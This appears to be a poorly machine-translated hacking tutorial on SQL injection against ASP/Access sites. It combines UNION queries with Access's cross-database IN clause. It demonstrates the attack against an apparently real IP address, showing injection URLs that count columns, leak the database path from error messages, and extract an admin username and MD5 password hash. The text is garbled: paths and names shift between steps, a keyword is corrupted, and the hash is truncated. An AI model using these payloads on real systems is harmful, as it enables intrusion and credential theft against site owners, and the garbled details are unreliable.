Everyone still remembers the MSSQL's cross-library query, in fact, in Access, you can also implement cross-queries between 2 data. Below I will introduce you to Access's cross-library query. Let us first take a look at how the Access is inquiry, and we will create an empty database, query the content of the admin list in the database D: /Daos/db/daidalos.mdb, SQL statement is:
Select * from admin in "d: /daos/db/daidalos.mdb" Click to view the original size picture query, successfully returns the content of the target database in the application admin list: Click to view the original size picture in the actual ASP injection, At the same time, 2 SELECT, if you are familiar with PHP MySQL injection, it should be easy to think of the joint query using Union. We can use it in Access, there is still a good place to use the Union query, do not go to the data a character. Go to guess, and data directly in the field like MySQL PHP (the specific MIX has written a detailed article). From the above, you can see that you must implement the following 2 conditions below:
Using the Union query must know the field of the table in the previous SELECT must know the location of the target database, the absolute path. Condition 1 We can manually deal with the prompt error message, or you can automatically be implemented. Condition 2 This is a difficult point, but we can be implemented by using the "Access Exposition". Some people will say that they can know the data location, that is not directly loaded, in fact, the current database generally prevents downloading, some are not Web Under contents. The first level in the black defense fourth round, is the set of 2 ASP Access download systems, one is the rainpoint download system, one is the throne download system. After testing the pirate download system, you can have a database but don't let the download, it seems that there is no place to be injectable, and the rain download system is a vulnerability, the database can be felt and can be downloaded directly, and can also be injected. However, the background of the rain is very simple, there is no place to use, our goal is put on the password password of the throne, and I will give you a demonstration of the throne system through the rain point system. Get the background password of the throne: We know that List.asp of the rainpoint system can be injected, let's get the number of data table fields in UNION, submit:
http://219.237.81.46/yddow/list.asp?id=75 20Union Select 1 FROM UserInfo returned:
Microsoft Jet Database Engine Errors '80040E14' does not match the number of columns in the two data sheets or queries selected in the joint query. /yddow/list.asp, the line 51 field is wrong, I wrote a perl script to automatically guess, (after the code is seen) When we submit:
http://219.237.81.46/yddown/list.asp?id=75 Union Select 1, 2, 3% 20From USERINFO no error Return: Click to view the original size picture Haha! We have obtained the number of fields, and we can get my location in the field 1, you can display the data we query. Now there is still a problem with the database, simple us, submit:
Http://219.237.81.46/dsdown\regs.asp success return path: Microsoft Jet Database Engine Error '80004005' D: /111/db/kljdsld.asa 'is not a valid path. Determine if the path name spell is correct, and whether it is connected to the server stored. /dsdown/db/user.asp, line 6 (Note: The path to this is not necessarily "complete", the real path is: d: /11/dsdown/db/kljdsld.asa) Next we cross-library, The constructing URL is as follows:
http://219.237.81.46/yddown/list.asp?id=75 Union Select Admin, 3, 2% 20From Admin IN "d:/11/dsdown/db/kljdsld.asa"% 20where% 20ID = 1 The above statement is that UNION query data D: /111/db/kljdsld.asa in the field of the field of the id = 1 in the object, if the successful username is directly out of the background management: Click to view Original size picture Get the user name as admin We will follow the vicious code:
http://219.237.81.46/yddow/list.asp?id=75 Union Select PWS, 3, 2% 20From ADMIN 1140"d:/111/dsdown/db/kljdsld.asa"% 20where% 20ID = 1 As shown: Get the password 32-bit MD5 encrypted Hash: 77e6cbb3f94687922, our cross-library query is successful, here I just demonstrate the inter-library query, there is no need to manage:). Summary This article mainly introduces two very useful methods, 1st we have a character to guess when you are injective, so that you are very troublesome, directly using UNITION data can directly anticipate data It is not a Chinese or special characters, you can go in place in one step. The second is a cross-library. It is very flexible to make you infiltrate, you can't think about harvest.
